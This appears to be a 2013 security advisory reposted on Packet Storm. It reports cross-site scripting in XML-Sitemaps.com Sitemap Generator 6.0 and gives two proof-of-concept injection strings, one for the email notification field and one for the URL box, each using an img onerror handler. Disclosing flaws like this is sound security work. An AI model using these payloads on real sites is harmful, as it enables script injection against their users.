XML-Sitemaps.com Sitemap Generator version 6.0 suffers from a cross site scripting vulnerability.
2bd42dbf91751de1628f25918e017d294b2f5f4b76c190a44f3b5310b1c37bf6# XML-Sitemaps.com Sitemap Generator
# Date: 2nd July 2013
# Author: Christy Philip Mathew (www.offcon.org)
# Vendor or Software Link: http://www.xml-sitemaps.com/generator-demo/
# Version : 6.0
*XSS Vulnerability *
(a) Configuration > Miscellaneous Settings > Send email notifications:
Update the email to a@a.com"><img src=x onerror=prompt(0);>
(b) Update the URL input box with
http://site.com"><img src=x onerror=prompt(/XSS/);>
Screenshot Attached
All the Best
*Christy Philip Mathew*
Information Security Researcher
Twitter: @christypriory
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed